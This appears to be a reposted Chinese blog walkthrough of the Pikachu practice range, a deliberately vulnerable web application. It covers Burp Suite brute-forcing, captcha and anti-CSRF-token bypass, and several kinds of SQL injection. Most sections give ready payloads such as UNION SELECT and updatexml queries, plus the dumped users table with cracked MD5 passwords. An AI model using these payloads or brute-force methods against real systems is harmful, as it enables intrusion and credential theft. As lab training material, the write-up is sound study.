當前位置：首頁 > 运维知识 > windows >内容正文

windows

pikachu靶场

發布時間：2024/1/18 windows 27 coder

生活随笔收集整理的這篇文章主要介紹了 pikachu靶场小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

pikachu靶場

基于表單暴力破解

看一下界面，有兩個輸入框，使用暴力破解使用Cluster bomb

前提須知是
Sinper 對$$符號標記的數據進行逐個替換
Battering ram 對$$符號標記的數據同時替換
Pitchfork 多參數，使用不同字典
Cluster bomb 多參數做笛卡爾乘積模式爆破，多個位置，交叉組合

bp抓包，發送到intrude，修改標記內容

設置payloads，set 1 2 type設置為simple load字典 進行 start attack, 將length大小排序就出來了

驗證碼繞過(on server)

比上面多了一個驗證碼，用bp抓包看下

嘗試了幾次賬號密碼都沒提示驗證碼的問題，說明驗證碼可以一直用，那就和上面思路一樣暴力破解

驗證碼繞過(on client)

嘗試輸入，發現會有彈窗，那就是前端，查看前端關于驗證碼的代碼，createCode()

老樣子的配置進行，依舊成功，前端驗證bp都能無視

token防爆破

一看沒有驗證碼了，token搜索下含義，令牌，驗證，防止csrf攻擊，

嘗試下bp顯示csrf token error，每次token都會變

再嘗試刪除token，response中什么返回結果都沒有，發現前端代碼hidden，token，value的代碼嘗試是下一次的token

攻擊模式選擇Pitchfork，因為Cluster bomb是三組payload排列組合，所以使用一對一的
第三個payload type設置為Recursive grep

先在這個界面選擇打勾然后add
雙擊下圖value的內容就自動填寫正則表達式了

還需要將線程設置為1，因為每次都要用上次response中返回的token，多線程就會亂

最后一步開跑就結束了

數字型注入

看一下源碼，沒有任何處理，那直接bp抓包修改

id=1 order by 2#&submit=%E6%9F%A5%E8%AF%A2
發現order by 3 報錯，order by2 正常，字段數就是2

正常走流程爆庫
id=1 union select 1,database()#
pikachu

爆表
id=1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#
 httpinfo,member,message,users,xssblind

爆字段
id=1 union select 1,group_concat(column_name) from information_schema.columns where table_schema=database()#
id,userid,ipaddress,useragent,httpaccept,remoteport,id,username,pw,sex,phonenum,address,email,id,content,time,id,username,password,level,id,time,content,name

下面就是字段里的數據了
1 union select username,password from users#
e10adc3949ba59abbe56e057f20f883e
670b14728ad9902aecba32e22fa4f6bd
e99a18c428cb38d5f260853678922e03
像是md5解碼，md5在線解密下
123456
000000
abc123

字符型注入

看一下源碼，需要考慮閉合是單引號

輸入萬能注入，有變化證明語句正確
1' or 1=1#

判斷字段數，道理同數字型注入
1' order by 2#

爆庫
1' union select 1,database()#
pikachu

爆表
1' union select group_concat(table_name),2 from information_schema.tables where table_schema=database()#
httpinfo,member,message,users,xssblind

爆字段
1' union select group_concat(column_name),2 from information_schema.columns where table_name='users'#
user_id,first_name,last_name,user,password,avatar,last_login,failed_login,id,username,password,level,id,username,password

爆值
1' union select username,password from users#
your uid:admin
your email is: e10adc3949ba59abbe56e057f20f883e
your uid:pikachu
your email is: 670b14728ad9902aecba32e22fa4f6bd
your uid:test
your email is: e99a18c428cb38d5f260853678922e03
同理用md5解密

XX型注入

查看源碼，單引號和括號

嘗試一下
1') or 1=1#
成功了，按照流程繼續

爆庫
1') union select 1,database()#
pikachu

爆表
1') union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#
httpinfo,member,message,users,xssblind

爆字段
1') union select 1,group_concat(column_name) from information_schema.columns where table_name='users'#
user_id,first_name,last_name,user,password,avatar,last_login,failed_login,id,username,password,level,id,username,password

爆值
1') union select username,password from users#
your uid:admin
your email is: e10adc3949ba59abbe56e057f20f883e

your uid:pikachu
your email is: 670b14728ad9902aecba32e22fa4f6bd

your uid:test
your email is: e99a18c428cb38d5f260853678922e03

搜索型注入

查看源碼，單引號和百分號

1%' or 1=1#
成功了，那還是老流程

判斷字段數，這個是到4才顯示錯誤
1%' order by 4#
字段數就是3了

爆庫
1%' union select 1,2,database()#
pikachu

爆表
1%' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()#
httpinfo,member,message,users,xssblind

爆字段
1%' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'#
user_id,first_name,last_name,user,password,avatar,last_login,failed_login,id,username,password,level,id,username,password

爆值
1%' union select username,password,3 from users#
username：admin
uid:e10adc3949ba59abbe56e057f20f883e
email is: 3

username：pikachu
uid:670b14728ad9902aecba32e22fa4f6bd
email is: 3

username：test
uid:e99a18c428cb38d5f260853678922e03
email is: 3

"insert/update"注入

查看源碼，會對字符進行轉義，聯合注入就不能用了，進行報錯注入

bp在注冊界面抓包,爆庫
1' or updatexml(1,concat(0x7e,database()),1) or'

爆表
1' or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())),1) or'

爆字段
1' or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users')),1) or'

爆值
1' or updatexml(1,concat(0x7e,(select group_concat(username,'@',password)from pikachu.users)),1) or'

"delete"注入

查看源代碼，

File inclusion(local)

先查看源碼，無限制，

總結

以上是生活随笔為你收集整理的pikachu靶场的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。

上一篇： Linux提升系统安全性：历史命令 HI
下一篇：变压器绕制